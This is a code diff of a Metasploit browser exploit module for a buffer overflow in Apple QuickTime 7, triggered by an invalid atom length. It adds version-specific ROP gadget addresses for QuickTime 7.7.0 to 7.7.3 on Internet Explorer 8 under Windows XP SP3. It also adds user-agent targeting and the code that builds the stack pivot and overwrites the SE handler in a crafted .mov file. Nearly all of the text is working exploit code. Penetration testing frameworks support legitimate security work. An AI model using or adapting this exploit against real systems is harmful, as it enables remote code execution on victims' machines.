@@ -11,11 +11,10 @@ class Metasploit4 < Msf::Exploit::Remote
1111 Rank = NormalRanking
1212
1313 include Msf ::Exploit ::Remote ::HttpServer ::HTML
14- include Msf ::Exploit ::RopDb
1514
1615 def initialize ( info = { } )
1716 super ( update_info ( info ,
18- 'Name' => "Apple Quicktime Invalid Atom Length Buffer Overflow" ,
17+ 'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow" ,
1918 'Description' => %q{
2019 This module exploits a vulnerability found in Apple Quicktime. The flaw is
2120 triggered when Quicktime fails to properly handle the data length for certain
@@ -40,10 +39,12 @@ def initialize(info={})
4039 'Platform' => 'win' ,
4140 'Targets' =>
4241 [
43- # Tested Quicktime versions:
44- # 7.7.3 (1680.64)
45- [ 'Automatic' , { } ] ,
46- [ 'IE 8 on Windows XP SP3' , { 'Rop' => true } ] # msvcrt (7.0.2600.5512)
42+ # All of the following addresses are from Quicktime.qts
43+ # RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET
44+ [ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3' , { 'Ret' => 0x66923467 , 'Nop' => 0x6692346d , 'Pop' => 0x66849239 } ] ,
45+ [ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3' , { 'Ret' => 0x669211C7 , 'Nop' => 0x669211CD , 'Pop' => 0x668C5B55 } ] ,
46+ [ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3' , { 'Ret' => 0x66920D67 , 'Nop' => 0x66920D6D , 'Pop' => 0x66849259 } ] ,
47+ [ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3' , { 'Ret' => 0x66920BD7 , 'Nop' => 0x66920BDD , 'Pop' => 0x668E963A } ]
4748 ] ,
4849 'Payload' =>
4950 {
@@ -55,34 +56,10 @@ def initialize(info={})
5556 'InitialAutoRunScript' => 'migrate -f'
5657 } ,
5758 'Privileged' => false ,
58- 'DisclosureDate' => "May 22 2013" ,
59- 'DefaultTarget' => 0 ) )
59+ 'DisclosureDate' => "May 22 2013"
60+ ) )
6061 end
6162
62-
63- def get_target ( agent )
64- return target if target . name != 'Automatic'
65-
66- nt = agent . scan ( /Windows NT (\d \. \d )/ ) . flatten [ 0 ] || ''
67- ie = agent . scan ( /MSIE (\d )/ ) . flatten [ 0 ] || ''
68-
69- ie_name = "IE #{ ie }
70-
71- case nt
72- when '5.1'
73- os_name = 'Windows XP SP3'
74- end
75-
76- targets . each do |t |
77- if ( !ie . empty? and t . name . include? ( ie_name ) ) and ( !nt . empty? and t . name . include? ( os_name ) )
78- return t
79- end
80- end
81-
82- nil
83- end
84-
85-
8663 def get_payload ( t )
8764 p = ''
8865
@@ -120,6 +97,18 @@ def get_payload(t)
12097 end
12198
12299
100+ def targetable? ( agent )
101+ if agent =~ /MSIE 8\. 0/ and agent =~ /Windows NT 5\. 1/
102+ return true
103+ elsif agent =~ /contype/
104+ # contype: a mov file request from Apple Quicktime
105+ return true
106+ end
107+
108+ false
109+ end
110+
111+
123112 def get_html ( t )
124113 js_p = ::Rex ::Text . to_unescape ( get_payload ( t ) , ::Rex ::Arch . endian ( t . arch ) )
125114 fake_mov_name = rand_text_alpha ( 4 ) + ".mov"
@@ -147,10 +136,8 @@ def on_request_uri(cli, request)
147136 agent = request . headers [ 'User-Agent' ]
148137 print_status ( "Requesting: #{ request . uri } )
149138
150- target = get_target ( agent )
151-
152- # contype: a mov file request from Apple Quicktime
153- if target . nil? and agent != 'contype'
139+
140+ unless targetable? ( agent )
154141 print_error ( "Browser not supported, sending 404: #{ agent } )
155142 send_not_found ( cli )
156143 return
@@ -171,22 +158,22 @@ def sort_bytes(data)
171158 data . map { |e | [ e ] . pack ( 'N' ) . scan ( /../ ) . reverse . join } . join
172159 end
173160
174- def rop_nop
175- [ 0x6692346d ] . pack ( 'V*' ) # Ret (QuickTime.qts)
161+ def rop_nop ( t )
162+ [ t [ 'Nop' ] ] . pack ( 'V*' ) # Ret (QuickTime.qts)
176163 end
177164
178165 def exploit
179166 buf = ''
180167 buf << rand_text_alpha ( 467 ) # 467 to algin the pivot
181168 10 . times {
182- buf << rop_nop
169+ buf << rop_nop ( target )
183170 }
184171 buf << [
185- 0x66849239 , # POP ESP; RET (QuickTime.qts)
172+ target [ 'Pop' ] , # POP ESP; RET (QuickTime.qts)
186173 0x20302020 # Target value for ESP (our ROP payload)
187174 ] . pack ( 'V*' )
188175 buf << rand_text_alpha ( 611 - buf . length ) # Offset 611 to hit SE Handler
189- buf << sort_bytes ( [ 0x66923467 ] ) # ADD ESP,280; RET (QuickTime.qts) - pivot
176+ buf << sort_bytes ( [ target . ret ] ) # ADD ESP,280; RET (QuickTime.qts) - pivot
190177 buf << rand_text_alpha ( 658 - buf . length ) # 658 bytes to padd up the mov file size
191178
192179 # Quicktime File Format Specifications:
0 commit comments